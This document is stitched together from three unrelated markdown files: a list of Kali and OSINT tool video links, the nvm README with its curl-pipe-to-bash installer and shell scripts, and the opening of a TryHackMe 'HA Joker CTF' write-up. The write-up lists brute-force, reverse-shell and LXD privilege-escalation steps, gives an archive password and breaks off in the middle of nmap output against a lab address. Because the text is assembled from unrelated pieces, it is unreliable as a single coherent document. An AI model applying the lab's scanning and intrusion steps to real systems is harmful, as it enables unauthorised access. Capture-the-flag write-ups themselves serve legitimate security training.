### Back [⤴](https://github.com/scsp-community/Cyber-Sec-Resources)
* [Buffer Overflow](https://www.youtube.com/watch?v=1dL0U2OhvH0&list=PL7yUP1guJz7c6-A-fGo8-CXeAtCWNcj3m)
* [Kali Tools - Sublist3r](https://www.youtube.com/watch?v=ePZvh60zuWw)
* [Kali Tools - EyeWitness](https://www.youtube.com/watch?v=x6gRIKlmPto&feature=youtu.be)
* [Kali Tools - SQLMap](https://www.youtube.com/watch?v=AznTganeebU)
* [Kali Tools - GoBuster](https://www.youtube.com/watch?v=wlhuAmN_HQg)
* [Kali Tools - JoomScan](https://www.youtube.com/watch?v=cT4dMwuk7Gs)
* [Kali Tools - HTTPProbe](https://www.youtube.com/watch?v=nQs5Bw7ErcU)
* [Kali Tools - Nikto](https://www.youtube.com/watch?v=-H17ZqCZcAU)
* [Kali Tools - CherryTree](https://youtu.be/vlmlb2kqbfo)
* [Kali Tools - Davtest](https://www.youtube.com/watch?v=fyubocGC8iY)
* [Kali Tools - DNSEnum](https://youtu.be/aoCHj0Eh5JA)
* [Kali Tools - Searchsploit and ExploitDB](https://www.youtube.com/watch?v=xxbsZVoTpGs)
* [Kali Tools - Enum4Linux](https://www.youtube.com/watch?v=1rxggQlPCBo&t=7s)
* [Kali Tools - Apache Users](https://www.youtube.com/watch?v=RxIfopiayQU&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=5&t=0s)
* [Kali Tools - URL Crazy ](https://www.youtube.com/watch?v=fxCgBHaO6Yg&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=6&t=0s)
* [Kali Tools - Crunch ](https://www.youtube.com/watch?v=eYxbJOHgshE&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=4&t=0s)
* [Kali Tools - SSLstrip](https://www.youtube.com/watch?v=D3NemrhZQSc&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=2&t=0s)
* [Kali Tools - SSLyze](https://www.youtube.com/watch?v=DvwHOIkzBiI&list=PL7yUP1guJz7f-vpZYch_TDLRX_C_sei6Y&index=3&t=0s)
* [OSINT Tools - Buster](https://www.youtube.com/watch?v=KXU1674j7fo&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=2&t=0s)
* [OSINT Tools - Danger Zone](https://www.youtube.com/watch?v=-ATtptQLzRU&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=3&t=0s)
* [OSINT Tools - R3con1z3r](https://www.youtube.com/watch?v=Jg3yibNeYcQ&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=4&t=0s)
* [OSINT Tools - Shodan](https://www.youtube.com/watch?v=9A77BUaHXmY&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=5&t=0s)
* [OSINT Tools - theHarvester](https://www.youtube.com/watch?v=kNA8Z4fDJbI&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=6&t=0s)
* [OSINT Tools - TinEye](https://www.youtube.com/watch?v=QfQvPE22p0U&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=7&t=0s)
* [OSINT Tools - SpiderFoot](https://www.youtube.com/watch?v=NE9jrv59HQg&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=8&t=0s)
* [OSINT Tools - Metagoofil](https://www.youtube.com/watch?v=tnWYZns2OZI&list=PL7yUP1guJz7fZNfZM-zkUieKSeA1TCG2S&index=9&t=0s)
|
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.34.0-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/684)
<!-- START doctoc generated TOC please keep comment here to allow auto update -->
<!-- DON'T EDIT THIS SECTION, INSTEAD RE-RUN doctoc TO UPDATE -->
## Table of Contents
- [Installation and Update](#installation-and-update)
- [Install & Update script](#install--update-script)
- [Ansible](#ansible)
- [Verify installation](#verify-installation)
- [Important Notes](#important-notes)
- [Git install](#git-install)
- [Manual Install](#manual-install)
- [Manual upgrade](#manual-upgrade)
- [Usage](#usage)
- [Long-term support](#long-term-support)
- [Migrating global packages while installing](#migrating-global-packages-while-installing)
- [Default global packages from file while installing](#default-global-packages-from-file-while-installing)
- [io.js](#iojs)
- [System version of node](#system-version-of-node)
- [Listing versions](#listing-versions)
- [Suppressing colorized output](#suppressing-colorized-output)
- [.nvmrc](#nvmrc)
- [Deeper Shell Integration](#deeper-shell-integration)
- [bash](#bash)
- [Automatically call `nvm use`](#automatically-call-nvm-use)
- [zsh](#zsh)
- [Calling `nvm use` automatically in a directory with a `.nvmrc` file](#calling-nvm-use-automatically-in-a-directory-with-a-nvmrc-file)
- [License](#license)
- [Running tests](#running-tests)
- [Bash completion](#bash-completion)
- [Usage](#usage-1)
- [Compatibility Issues](#compatibility-issues)
- [Installing nvm on Alpine Linux](#installing-nvm-on-alpine-linux)
- [Removal](#removal)
- [Manual Uninstall](#manual-uninstall)
- [Docker for development environment](#docker-for-development-environment)
- [Problems](#problems)
- [Mac OS "troubleshooting"](#mac-os-troubleshooting)
<!-- END doctoc generated TOC please keep comment here to allow auto update -->
## Installation and Update
### Install & Update script
To **install** or **update** nvm, you can use the [install script][2] using cURL:
```sh
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash
```
or Wget:
```sh
wget -qO- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash
```
<sub>The script clones the nvm repository to `~/.nvm` and adds the source line to your profile (`~/.bash_profile`, `~/.zshrc`, `~/.profile`, or `~/.bashrc`).</sub>
<sub>**Note:** If the environment variable `$XDG_CONFIG_HOME` is present, it will place the `nvm` files there.</sub>
```sh
export NVM_DIR="${XDG_CONFIG_HOME/:-$HOME/.}nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
**Note:** You can add `--no-use` to the end of the above script (...`nvm.sh --no-use`) to postpone using `nvm` until you manually [`use`](#usage) it.
You can customize the install source, directory, profile, and version using the `NVM_SOURCE`, `NVM_DIR`, `PROFILE`, and `NODE_VERSION` variables.
Eg: `curl ... | NVM_DIR="path/to/nvm"`. Ensure that the `NVM_DIR` does not contain a trailing slash.
<sub>*NB. The installer can use `git`, `curl`, or `wget` to download `nvm`, whatever is available.*</sub>
**Note:** On Linux, after running the install script, if you get `nvm: command not found` or see no feedback from your terminal after you type:
```sh
command -v nvm
```
simply close your current terminal, open a new terminal, and try verifying again.
**Note:** Since OS X 10.9, `/usr/bin/git` has been preset by Xcode command line tools, which means we can't properly detect if Git is installed or not. You need to manually install the Xcode command line tools before running the install script, otherwise, it'll fail. (see [#1782](https://github.com/creationix/nvm/issues/1782))
**Note:** On OS X, if you get `nvm: command not found` after running the install script, one of the following might be the reason:-
- your system may not have a [`.bash_profile file`] where the command is set up. Simply create one with `touch ~/.bash_profile` and run the install script again
- you might need to restart your terminal instance. Try opening a new tab/window in your terminal and retry.
If the above doesn't fix the problem, open your `.bash_profile` and add the following line of code:
`source ~/.bashrc`
- For more information about this issue and possible workarounds, please [refer here](https://github.com/creationix/nvm/issues/576)
#### Ansible
You can use a task:
```
- name: nvm
shell: >
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash
args:
creates: "{{ ansible_env.HOME }}/.nvm/nvm.sh"
```
### Verify installation
To verify that nvm has been installed, do:
```sh
command -v nvm
```
which should output 'nvm' if the installation was successful. Please note that `which nvm` will not work, since `nvm` is a sourced shell function, not an executable binary.
### Important Notes
If you're running a system without prepackaged binary available, which means you're going to install nodejs or io.js from its source code, you need to make sure your system has a C++ compiler. For OS X, Xcode will work, for Debian/Ubuntu based GNU/Linux, the `build-essential` and `libssl-dev` packages work.
**Note:** `nvm` does not support Windows (see [#284](https://github.com/creationix/nvm/issues/284)). Two alternatives exist, which are neither supported nor developed by us:
- [nvm-windows](https://github.com/coreybutler/nvm-windows)
- [nodist](https://github.com/marcelklehr/nodist)
**Note:** `nvm` does not support [Fish] either (see [#303](https://github.com/creationix/nvm/issues/303)). Alternatives exist, which are neither supported nor developed by us:
- [bass](https://github.com/edc/bass) allows you to use utilities written for Bash in fish shell
- [fast-nvm-fish](https://github.com/brigand/fast-nvm-fish) only works with version numbers (not aliases) but doesn't significantly slow your shell startup
- [plugin-nvm](https://github.com/derekstavis/plugin-nvm) plugin for [Oh My Fish](https://github.com/oh-my-fish/oh-my-fish), which makes nvm and its completions available in fish shell
- [fnm](https://github.com/fisherman/fnm) - [fisherman](https://github.com/fisherman/fisherman)-based version manager for fish
- [fish-nvm](https://github.com/FabioAntunes/fish-nvm) - Wrapper around nvm for fish, delays sourcing nvm until it's actually used.
**Note:** We still have some problems with FreeBSD, because there is no official pre-built binary for FreeBSD, and building from source may need [patches](https://www.freshports.org/www/node/files/patch-deps_v8_src_base_platform_platform-posix.cc); see the issue ticket:
- [[#900] [Bug] nodejs on FreeBSD may need to be patched](https://github.com/creationix/nvm/issues/900)
- [nodejs/node#3716](https://github.com/nodejs/node/issues/3716)
**Note:** On OS X, if you do not have Xcode installed and you do not wish to download the ~4.3GB file, you can install the `Command Line Tools`. You can check out this blog post on how to just that:
- [How to Install Command Line Tools in OS X Mavericks & Yosemite (Without Xcode)](http://osxdaily.com/2014/02/12/install-command-line-tools-mac-os-x/)
**Note:** On OS X, if you have/had a "system" node installed and want to install modules globally, keep in mind that:
- When using nvm you do not need `sudo` to globally install a module with `npm -g`, so instead of doing `sudo npm install -g grunt`, do instead `npm install -g grunt`
- If you have an `~/.npmrc` file, make sure it does not contain any `prefix` settings (which is not compatible with nvm)
- You can (but should not?) keep your previous "system" node install, but nvm will only be available to your user account (the one used to install nvm). This might cause version mismatches, as other users will be using `/usr/local/lib/node_modules/*` VS your user account using `~/.nvm/versions/node/vX.X.X/lib/node_modules/*`
Homebrew installation is not supported. If you have issues with homebrew-installed `nvm`, please `brew uninstall` it, and install it using the instructions below, before filing an issue.
**Note:** If you're using `zsh` you can easily install `nvm` as a zsh plugin. Install [`zsh-nvm`](https://github.com/lukechilds/zsh-nvm) and run `nvm upgrade` to upgrade.
**Note:** Git versions before v1.7 may face a problem of cloning nvm source from GitHub via https protocol, and there is also different behavior of git before v1.6, and git prior to [v1.17.10](https://github.com/git/git/commit/5a7d5b683f869d3e3884a89775241afa515da9e7) can not clone tags, so the minimum required git version is v1.7.10. If you are interested in the problem we mentioned here, please refer to GitHub's [HTTPS cloning errors](https://help.github.com/articles/https-cloning-errors/) article.
### Git install
If you have `git` installed (requires git v1.7.10+):
1. clone this repo in the root of your user profile
- `cd ~/` from anywhere then `git clone https://github.com/creationix/nvm.git .nvm`
1. `cd ~/.nvm` and check out the latest version with `git checkout v0.34.0`
1. activate nvm by sourcing it from your shell: `. nvm.sh`
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
```
### Manual Install
For a fully manual install, execute the following lines to first clone the nvm repository into `$HOME/.nvm`, and then load nvm:
```sh
export NVM_DIR="$HOME/.nvm" && (
git clone https://github.com/creationix/nvm.git "$NVM_DIR"
cd "$NVM_DIR"
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
Now add these lines to your `~/.bashrc`, `~/.profile`, or `~/.zshrc` file to have it automatically sourced upon login:
(you may have to add to more than one of the above files)
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
```
### Manual upgrade
For manual upgrade with `git` (requires git v1.7.10+):
1. change to the `$NVM_DIR`
1. pull down the latest changes
1. check out the latest version
1. activate the new version
```sh
(
cd "$NVM_DIR"
git fetch --tags origin
git checkout `git describe --abbrev=0 --tags --match "v[0-9]*" $(git rev-list --tags --max-count=1)`
) && \. "$NVM_DIR/nvm.sh"
```
## Usage
To download, compile, and install the latest release of node, do this:
```sh
nvm install node # "node" is an alias for the latest version
```
To install a specific version of node:
```sh
nvm install 6.14.4 # or 10.10.0, 8.9.1, etc
```
The first version installed becomes the default. New shells will start with the default version of node (e.g., `nvm alias default`).
You can list available versions using ls-remote:
```sh
nvm ls-remote
```
And then in any new shell just use the installed version:
```sh
nvm use node
```
Or you can just run it:
```sh
nvm run node --version
```
Or, you can run any arbitrary command in a subshell with the desired version of node:
```sh
nvm exec 4.2 node --version
```
You can also get the path to the executable to where it was installed:
```sh
nvm which 5.0
```
In place of a version pointer like "0.10" or "5.0" or "4.2.1", you can use the following special default aliases with `nvm install`, `nvm use`, `nvm run`, `nvm exec`, `nvm which`, etc:
- `node`: this installs the latest version of [`node`](https://nodejs.org/en/)
- `iojs`: this installs the latest version of [`io.js`](https://iojs.org/en/)
- `stable`: this alias is deprecated, and only truly applies to `node` `v0.12` and earlier. Currently, this is an alias for `node`.
- `unstable`: this alias points to `node` `v0.11` - the last "unstable" node release, since post-1.0, all node versions are stable. (in SemVer, versions communicate breakage, not stability).
### Long-term support
Node has a [schedule](https://github.com/nodejs/Release#release-schedule) for long-term support (LTS) You can reference LTS versions in aliases and `.nvmrc` files with the notation `lts/*` for the latest LTS, and `lts/argon` for LTS releases from the "argon" line, for example. In addition, the following commands support LTS arguments:
- `nvm install --lts` / `nvm install --lts=argon` / `nvm install 'lts/*'` / `nvm install lts/argon`
- `nvm uninstall --lts` / `nvm uninstall --lts=argon` / `nvm uninstall 'lts/*'` / `nvm uninstall lts/argon`
- `nvm use --lts` / `nvm use --lts=argon` / `nvm use 'lts/*'` / `nvm use lts/argon`
- `nvm exec --lts` / `nvm exec --lts=argon` / `nvm exec 'lts/*'` / `nvm exec lts/argon`
- `nvm run --lts` / `nvm run --lts=argon` / `nvm run 'lts/*'` / `nvm run lts/argon`
- `nvm ls-remote --lts` / `nvm ls-remote --lts=argon` `nvm ls-remote 'lts/*'` / `nvm ls-remote lts/argon`
- `nvm version-remote --lts` / `nvm version-remote --lts=argon` / `nvm version-remote 'lts/*'` / `nvm version-remote lts/argon`
Any time your local copy of `nvm` connects to https://nodejs.org, it will re-create the appropriate local aliases for all available LTS lines. These aliases (stored under `$NVM_DIR/alias/lts`), are managed by `nvm`, and you should not modify, remove, or create these files - expect your changes to be undone, and expect meddling with these files to cause bugs that will likely not be supported.
### Migrating global packages while installing
If you want to install a new version of Node.js and migrate npm packages from a previous version:
```sh
nvm install node --reinstall-packages-from=node
```
This will first use "nvm version node" to identify the current version you're migrating packages from. Then it resolves the new version to install from the remote server and installs it. Lastly, it runs "nvm reinstall-packages" to reinstall the npm packages from your prior version of Node to the new one.
You can also install and migrate npm packages from specific versions of Node like this:
```sh
nvm install 6 --reinstall-packages-from=5
nvm install v4.2 --reinstall-packages-from=iojs
```
### Default global packages from file while installing
If you have a list of default packages you want installed every time you install a new version, we support that too -- just add the package names, one per line, to the file `$NVM_DIR/default-packages`. You can add anything npm would accept as a package argument on the command line.
```sh
# $NVM_DIR/default-packages
rimraf
object-inspect@1.0.2
stevemao/left-pad
```
### io.js
If you want to install [io.js](https://github.com/iojs/io.js/):
```sh
nvm install iojs
```
If you want to install a new version of io.js and migrate npm packages from a previous version:
```sh
nvm install iojs --reinstall-packages-from=iojs
```
The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js.
### System version of node
If you want to use the system-installed version of node, you can use the special default alias "system":
```sh
nvm use system
nvm run system --version
```
### Listing versions
If you want to see what versions are installed:
```sh
nvm ls
```
If you want to see what versions are available to install:
```sh
nvm ls-remote
```
#### Suppressing colorized output
`nvm ls`, `nvm ls-remote` and `nvm alias` usually produce colorized output. You can disable colors with the `--no-colors` option (or by setting the environment variable `TERM=dumb`):
```sh
nvm ls --no-colors
TERM=dumb nvm ls
```
To restore your PATH, you can deactivate it:
```sh
nvm deactivate
```
To set a default Node version to be used in any new shell, use the alias 'default':
```sh
nvm alias default node
```
To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`:
```sh
export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist
nvm install node
NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2
```
To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`:
```sh
export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist
nvm install iojs-v1.0.3
NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3
```
`nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions.
### .nvmrc
You can create a `.nvmrc` file containing a node version number (or any other string that `nvm` understands; see `nvm --help` for details) in the project root directory (or any parent directory).
Afterwards, `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will use the version specified in the `.nvmrc` file if no version is supplied on the command line.
For example, to make nvm default to the latest 5.9 release, the latest LTS version, or the latest node version for the current directory:
```sh
$ echo "5.9" > .nvmrc
$ echo "lts/*" > .nvmrc # to default to the latest LTS version
$ echo "node" > .nvmrc # to default to the latest version
```
Then when you run nvm:
```sh
$ nvm use
Found '/path/to/project/.nvmrc' with version <5.9>
Now using node v5.9.1 (npm v3.7.3)
```
`nvm use` et. al. will traverse directory structure upwards from the current directory looking for the `.nvmrc` file. In other words, running `nvm use` et. al. in any subdirectory of a directory with an `.nvmrc` will result in that `.nvmrc` being utilized.
The contents of a `.nvmrc` file **must** be the `<version>` (as described by `nvm --help`) followed by a newline. No trailing spaces are allowed, and the trailing newline is required.
### Deeper Shell Integration
You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new).
If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples.
#### bash
##### Automatically call `nvm use`
Put the following at the end of your `$HOME/.bashrc`:
```bash
find-up () {
path=$(pwd)
while [[ "$path" != "" && ! -e "$path/$1" ]]; do
path=${path%/*}
done
echo "$path"
}
cdnvm(){
cd "$@";
nvm_path=$(find-up .nvmrc | tr -d '[:space:]')
# If there are no .nvmrc file, use the default nvm version
if [[ ! $nvm_path = *[^[:space:]]* ]]; then
declare default_version;
default_version=$(nvm version default);
# If there is no default version, set it to `node`
# This will use the latest version on your machine
if [[ $default_version == "N/A" ]]; then
nvm alias default node;
default_version=$(nvm version default);
fi
# If the current version is not the default version, set it to use the default version
if [[ $(nvm current) != "$default_version" ]]; then
nvm use default;
fi
elif [[ -s $nvm_path/.nvmrc && -r $nvm_path/.nvmrc ]]; then
declare nvm_version
nvm_version=$(<"$nvm_path"/.nvmrc)
# Add the `v` suffix if it does not exists in the .nvmrc file
if [[ $nvm_version != v* ]]; then
nvm_version="v""$nvm_version"
fi
# If it is not already installed, install it
if [[ $(nvm ls "$nvm_version" | tr -d '[:space:]') == "N/A" ]]; then
nvm install "$nvm_version";
fi
if [[ $(nvm current) != "$nvm_version" ]]; then
nvm use "$nvm_version";
fi
fi
}
alias cd='cdnvm'
```
This alias would search 'up' from your current directory in order to detect a `.nvmrc` file. If it finds it, it will switch to that version; if not, it will use the default version.
#### zsh
##### Calling `nvm use` automatically in a directory with a `.nvmrc` file
Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an
`.nvmrc` file with a string telling nvm which node to `use`:
```zsh
# place this after nvm initialization!
autoload -U add-zsh-hook
load-nvmrc() {
local node_version="$(nvm version)"
local nvmrc_path="$(nvm_find_nvmrc)"
if [ -n "$nvmrc_path" ]; then
local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")")
if [ "$nvmrc_node_version" = "N/A" ]; then
nvm install
elif [ "$nvmrc_node_version" != "$node_version" ]; then
nvm use
fi
elif [ "$node_version" != "$(nvm version default)" ]; then
echo "Reverting to nvm default version"
nvm use default
fi
}
add-zsh-hook chpwd load-nvmrc
load-nvmrc
```
## License
nvm is released under the MIT license.
Copyright (C) 2010 Tim Caswell and Jordan Harband
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
## Running tests
Tests are written in [Urchin]. Install Urchin (and other dependencies) like so:
npm install
There are slow tests and fast tests. The slow tests do things like install node
and check that the right versions are used. The fast tests fake this to test
things like aliases and uninstalling. From the root of the nvm git repository,
run the fast tests like this:
npm run test/fast
Run the slow tests like this:
npm run test/slow
Run all of the tests like this:
npm test
Nota bene: Avoid running nvm while the tests are running.
## Bash completion
To activate, you need to source `bash_completion`:
```sh
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`).
### Usage
nvm:
> $ nvm <kbd>Tab</kbd>
```
alias deactivate install ls run unload
clear-cache exec list ls-remote unalias use
current help list-remote reinstall-packages uninstall version
```
nvm alias:
> $ nvm alias <kbd>Tab</kbd>
```
default
```
> $ nvm alias my_alias <kbd>Tab</kbd>
```
v0.6.21 v0.8.26 v0.10.28
```
nvm use:
> $ nvm use <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
nvm uninstall:
> $ nvm uninstall <kbd>Tab</kbd>
```
my_alias default v0.6.21 v0.8.26 v0.10.28
```
## Compatibility Issues
`nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606))
The following are known to cause issues:
Inside `~/.npmrc`:
```sh
prefix='some/path'
```
Environment Variables:
```sh
$NPM_CONFIG_PREFIX
$PREFIX
```
Shell settings:
```sh
set -e
```
## Installing nvm on Alpine Linux
In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al).
Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [BusyBox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. BusyBox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that.
There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally.
If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell:
```sh
apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | bash
```
The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries.
As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node).
## Removal
### Manual Uninstall
To remove nvm manually, execute the following:
```sh
$ rm -rf "$NVM_DIR"
```
Edit ~/.bashrc (or other shell resource config) and remove the lines below:
```sh
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[[ -r $NVM_DIR/bash_completion ]] && \. $NVM_DIR/bash_completion
```
## Docker for development environment
To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository:
```sh
$ docker build -t nvm-dev .
```
This will package your current nvm repository with our pre-defined development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`:
```sh
$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
nvm-dev latest 9ca4c57a97d8 7 days ago 650 MB
```
If you got no error message, now you can easily involve in:
```sh
$ docker run -h nvm-dev -it nvm-dev
nvm@nvm-dev:~/.nvm$
```
Please note that it'll take about 8 minutes to build the image and the image size would be about 650MB, so it's not suitable for production usage.
For more information and documentation about docker, please refer to its official website:
- https://www.docker.com/
- https://docs.docker.com/
## Problems
- If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following:
curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume.
- Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43)
- After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source:
```sh
nvm install -s 0.8.6
```
- If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658))
## Mac OS "troubleshooting"
**nvm node version not found in vim shell**
If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run:
```shell
sudo chmod ugo-x /usr/libexec/path_helper
```
More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x).
[1]: https://github.com/creationix/nvm.git
[2]: https://github.com/creationix/nvm/blob/v0.34.0/install.sh
[3]: https://travis-ci.org/creationix/nvm
[4]: https://github.com/creationix/nvm/releases/tag/v0.34.0
[Urchin]: https://github.com/scraperwiki/urchin
[Fish]: http://fishshell.com
|
# HA Joker CTF
Batman hits Joker.
[HA Joker CTF](https://tryhackme.com/room/jokerctf)
## Topic's
- Network Enumeration
- Web Enumeration
- Brute Forcing (http-get)
- Backup Poking
- Brute Forcing (Zip)
- Stored Passwords & Keys
- SQL Enumeration
- Brute Forcing (Hash)
- Exploitation (LXC)
## Appendix archive
Password: `1 kn0w 1 5h0uldn'7!`
## Task 1 HA Joker CTF
We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if you have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.
**Enumerate Services**
- Nmap
**Bruteforce**
- Performing Bruteforce on files over http
- Performing Bruteforce on Basic Authentication
**Hash Crack**
- Performing Bruteforce on hash to crack zip file
- Performing Bruteforce on hash to crack mysql user
**Exploitation**
- Getting a reverse connection
- Spawning a TTY Shell
**Privilege Escalation**
- Get root taking advantage of flaws in LXD
---
```
kali@kali:~/CTFs/tryhackme/HA Joker CTF$ sudo nmap -p- -sS -sC -sV -O 10.10.252.64
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-08 19:57 CEST
Nmap scan report for 10.10.252.64
Host is up (0.034s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: Joker
8080/tcp open http Apache httpd 2.4.29
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/8%OT=22%CT=1%CU=38238%PV=Y%DS=2%DC=I%G=Y%TM=5F7F533
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1
OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
